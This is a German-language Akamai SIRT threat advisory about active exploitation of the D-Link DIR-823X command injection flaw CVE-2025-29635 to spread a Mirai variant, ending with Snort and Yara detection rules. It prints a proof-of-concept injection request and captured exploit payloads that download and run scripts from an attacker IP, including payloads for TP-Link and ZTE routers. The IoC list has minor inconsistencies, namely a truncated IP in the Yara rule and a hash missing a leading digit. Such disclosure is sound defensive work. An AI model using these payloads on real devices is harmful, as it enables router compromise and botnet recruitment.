Wichtige Erkenntnisse
Das Security Intelligence and Response Team (SIRT) von Akamai hat eine aktive Ausnutzung der Command-Injection-Sicherheitslücke CVE-2025-29635 bei Routern der Serie D-Link DIR-823X festgestellt. Obwohl die Geräte im Jahr 2025 vom Markt genommen wurden, nutzen Cyberkriminelle diese Schwachstelle zur Verbreitung von Varianten des Mirai-Botnets.
Die SIRT hat diese Aktivitäten erstmals im März 2026 in unserem globalen Netzwerk von Honeypots festgestellt. Dies ist die erste gemeldete aktive Ausnutzung dieser Schwachstellen seit deren ersten Offenlegungen im März 2025.
Wir haben in diesem Blogbeitrag eine Liste von Indikatoren für eine Kompromittierung (Indicators of Compromise, IoCs) zusammengestellt, um diese Bedrohung abzuwehren.
Aktive Angriffsversuche auf D-Link-Systeme entdeckt
Das Akamai SIRT entdeckte Anfang März 2026 aktive Angriffsversuche auf die D-Link-Command-Injection-Sicherheitslücke CVE-2025-29635 in unserem globalen Netzwerk von Honeypots. Diese Sicherheitslücke betrifft Router der Serie D-Link DIR-823X mit den Firmware-Versionen 240126 und 24082. Sie ermöglicht es einem autorisierten Angreifer, beliebige Befehle auf entfernten Geräten auszuführen, indem er über die entsprechende Funktion eine POST-Anfrage an den Endpunkt /goform/set_prohibiting sendet. Dies kann eine Remote-Code-Ausführung auslösen.
Analyse der Firmware-Schwachstelle CVE-2025-29635
CVE-2025-29635 ist eine Command-Injection-Sicherheitslücke, die Ende März 2025 öffentlich bekannt wurde. Sie betrifft Router der Serie D-Link DIR-823X in den Firmware-Versionen 240126 und 24082. Laut einer Mitteilung des Herstellers werden diese Router seit September 2025 nicht mehr unterstützt und gelten als veraltet.
Die Sicherheitsforscher Wang Jinshuai und Zhao Jiangting entdeckten und meldeten den Fehler und analysierten die Funktion sub_42232C in der Binärdatei aus Abbildung 1 per Rückentwicklung. Sie stellten fest, dass der Wert der Funktion „macaddr“ mithilfe der Funktion „snprintf“ in die Variable „command“ kopiert wird, woraufhin die Funktion „system“ ausgeführt wird. Durch das gezielte Manipulieren des macaddr-Werts kann ein Angreifer die Ausführung von Befehlen auslösen, indem er eine POST-Anfrage an die Adresse /goform/set_prohibiting sendet.
Abb. 1: Die Firmware-Schwachstelle CVE-2025-29635
Die Forscher veröffentlichten einen öffentlichen Proof-of-Concept-Exploit auf GitHub, der mit der CVE-Meldung verknüpft war. Dieser wurde jedoch inzwischen wieder entfernt (Abbildung 2). Zum Zeitpunkt der Erstellung dieses Blogbeitrags war diese Schwachstelle noch nicht im KEV-Katalog bekannter, ausgenutzter Schwachstellen der CISA aufgeführt.
POST /goform/set_prohibiting HTTP/1.1
Host: 192.168.122.130
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Origin: http://192.168.122.130
Connection: close
Referer: http://192.168.122.130/login.html
Cookie: sessionid=00000000000000000000000000000000; token=00000000000000000000000000000000
macaddr=||touch%20/set_prohibiting||&token=00000000000000000000000000000000Honeypot-Daten zeigen aktive Botnet-Kampagnen auf
Das Akamai SIRT entdeckte Anfang März 2026 in unserem globalen Netzwerk von Honeypots aktive Angriffsversuche auf die Schwachstelle CVE-2025-29635 (siehe Abbildung 3).
POST /goform/set_prohibiting HTTP/1.1
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
parameter=;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget http://88.214.20[.]14/dlink.sh -O dlink.sh; curl -o dlink.sh http://88.214.20[.]14/dlink.sh; wget http://88.214.20[.]14/dlink.sh; chmod 777 dlink.sh; sh dlink.sh; tftp 88.214.20[.]14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20[.]14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20[.]14 ftp1.sh ftp1.sh; sh ftp1.sh;Ein Großteil der in Abbildung 3 dargestellten Anfrage entspricht dem Proof-of-Concept-Exploit aus Abbildung 2, es gibt jedoch einige wichtige Unterschiede. Dieser Versuch enthält beispielsweise keine bestimmten Header wie Referer oder Accept-Language. Er bietet keine Authentifizierung in Form von Token oder Session-IDs, weder im Header noch im Body.
Es scheint jedoch, dass die Firmware die Existenz oder Gültigkeit dieser Felder und Werte nicht überprüfen kann. Bei diesem Fehler extrahiert der Router den Wert, der im Befehls-Puffer landet, direkt aus dem Anfragehauptteil, ohne zu überprüfen, aus welchem Formularfeld er stammt. Wenn der Parser alle Schlüssel-Wert-Paare im Hauptteil als mögliche Kandidaten für das macaddr-Feld interpretiert oder den gesamten Body unverändert in den Puffer kopiert, könnte ein Angreifer bösartigen Code unter einem beliebigen Namen, wie z. B. einem Parameter, einschleusen.
Daher zielt dieser Ausnutzungsversuch, obwohl er sich in einigen wesentlichen Aspekten vom PoC-Exploit unterscheidet, auf denselben anfälligen Codeabschnitt ab und löst denselben system()-Aufruf aus, der die angegebene Shell-Befehlssequenz ausführt.
Technische Analyse der Mirai-Variante
Das im Rahmen des Ausnutzungsversuchs geladene Shell-Skript ist sehr einfach aufgebaut und lädt eine Mirai-Malware-Payload namens „tuxnokill“ herunter. Diese unterstützt verschiedene Architekturen von derselben Downloader-IP-Adresse 88.214.20[.]14. Die Schadsoftware scheint eine typische Variante der Mirai-Malware zu sein, die eine XOR-Verschlüsselung mit einem Entschlüsselungsschlüssel von 0x30 verwendet. Sie enthält auch einen fest programmierten Konsolen-Ausführungsbefehl, der bei Mirai-Payloads üblich ist und den Text „segmentation fault (core dumped)“ (Segmentierungsfehler (Core-Dump)) ausgibt, sowie eine hartcodierte Downloader-IP-Adresse. Basierend auf Sandbox-Verbindungen lautet die IP-Adresse für Command and Control 64.89.161[.]130, wobei der Port 44300 verwendet wird.
Im Gegensatz zu anderen Angreifern, die Payloads zunehmend per Vibe-Coding erstellen, gehen wir davon aus, dass dieser Angreifer seinen Schadcode auf herkömmliche Weise programmiert hat, wie der hartkodierte String „AI.NEEDS.TO.DIE“ (KI muss sterben) in seiner Malware zeigt. Die von der Schadsoftware erkannten Angriffsbefehle sind recht häufig anzutreffen (Abbildung 4).
TCP STOMP
TCP ACK
TCP SYN
STD
GRE ETH
UDP DNS
UDP VSE
UDP PLAIN
UDP GENERIC
RAW
XMAS
HTTP NULLBeobachtete Ausnutzung von TP-Link- und ZTE-Sicherheitslücken
Neben dem Angriff auf CVE-2025-29635 versuchte dieser Angreifer, zwei weitere Schwachstellen in unserem Honeypot-Netzwerk auszunutzen: CVE-2023-1389 (Abbildung 5) betrifft TP-Link-Geräte Archer AX21, während ein weiterer Exploit eine Remote-Code-Ausführung (RCE) (Abbildung 6) auf einem ZTE-Router ZXV10 H108L ermöglicht.
POST /cgi-bin/luci/;stok=/local?form=country HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
operation=write&country=$(id>curl -o tplinkwan.sh http://88.214.20[.]14/tplinkwan.sh; wget http://88.214.20[.]14/tplinkwan.sh; chmod 777 tplinkwan.sh; sh tplinkwan.sh; tftp 88.214.20[.]14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20[.]14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20[.]14 ftp1.sh ftp1.sh; sh ftp1.sh)POST /manager_dev_ping_t HTTP/1.1
Host: honeypot_ip:8083
User-Agent: Go-http-client/1.1
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&Host=;$(cd /tmp;wget http://88.214.20[.]14/bins/tux.mips; chmod 777 tux.mips; ./tux.mips zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submitFazit
Malware-Kampagnen von Mirai plagen die Branche nach wie vor, auch wenn ein Großteil des ursprünglichen Quellcodes weiterhin von verschiedenen, sowohl erfahrenen als auch ungelernten Cyberkriminellen wiederverwendet wird. Die niedrigen Einstiegshürden und der potenzielle finanzielle Nutzen sind einige der Anreize, die Einzelpersonen dazu verleiten können, sich mit Botnetzen zu beschäftigen und zu einem Cyberkriminellen zu werden.
Obwohl dieser Angreifer sich leidenschaftlich gegen KI ausspricht, werden viele andere sie als Werkzeug ansehen, das für ruchlose Zwecke genutzt werden kann. Ob es darum geht, Angreifern beim Programmieren von Malware zu helfen oder neue Sicherheitslücken zu identifizieren, die ausgenutzt werden können – das Potenzial von KI ist sowohl für Cyberkriminelle als auch für Cybersicherheitsfachleute vorhanden.
Viele Cyberkriminelle, die mit Botnetzen aktiv sind, nutzen häufig ältere Sicherheitslücken aus. Insbesondere wenn für diese Schwachstellen öffentlich zugängliche Proof-of-Concept-Exploits existieren, können Angreifer diese leicht in ihre Angriffsvektoren integrieren.
Leider konfigurieren viele Organisationen weltweit ihre Geräte falsch, versäumen es, Sicherheitsupdates rechtzeitig zu installieren oder verwenden weiterhin veraltete, anfällige Geräte, wie es bei den Routern der Serie D-Link 823X der Fall ist. Wir empfehlen Unternehmen dringend, regelmäßig Sicherheitslücken zu überwachen, die für ihre Infrastruktur relevant sind, und die entsprechenden Patches, Updates und Sicherheitsmaßnahmen anzuwenden, um ihre eigene Betriebssicherheit zu gewährleisten.
Bleiben Sie auf dem Laufenden
Das Akamai SIRT wird Bedrohungen wie diese weiterhin überwachen und melden, sowohl für unsere Kunden als auch für die Sicherheitscommunity insgesamt. Besuchen Sie unsere Forschungs-Homepage und folgen Sie uns in den sozialen Medien, um über das SIRT und andere Veröffentlichung der Akamai Security Intelligence Group informiert zu werden.
IOCs
Wir haben eine Liste von IoCs sowie Snort- und Yara-Regeln zusammengestellt, um Sicherheitsteams zu unterstützen.
Snort-Regeln für schädliche IPs
alert ip any any -> [88.214.20.14, 64.89.161.130] any (
msg:"Possible Botnet Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)Yara-Regeln für Malware-Samples
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2026-03-27"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$string1 = "segmentation fault (core dumped)"
$string2 = “AI.NEEDS.TO.DIE”
$ip1 = "88.214.20.14"
$ip2 = "64.89.161.13"
$hash1 = "32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100"
$hash2 = "be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b"
$hash3 = "d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7"
$hash4 = "7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8"
$hash5 = "72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8"
condition:
(
$string1 or
$string2 or
$ip1 or
$ip2 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5
)
}Schädliche IPv4-Adressen
88.214.20.14
64.89.161.130
SHA256-Hashes
2ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100
be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b
d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7
7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8
72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8
Tags
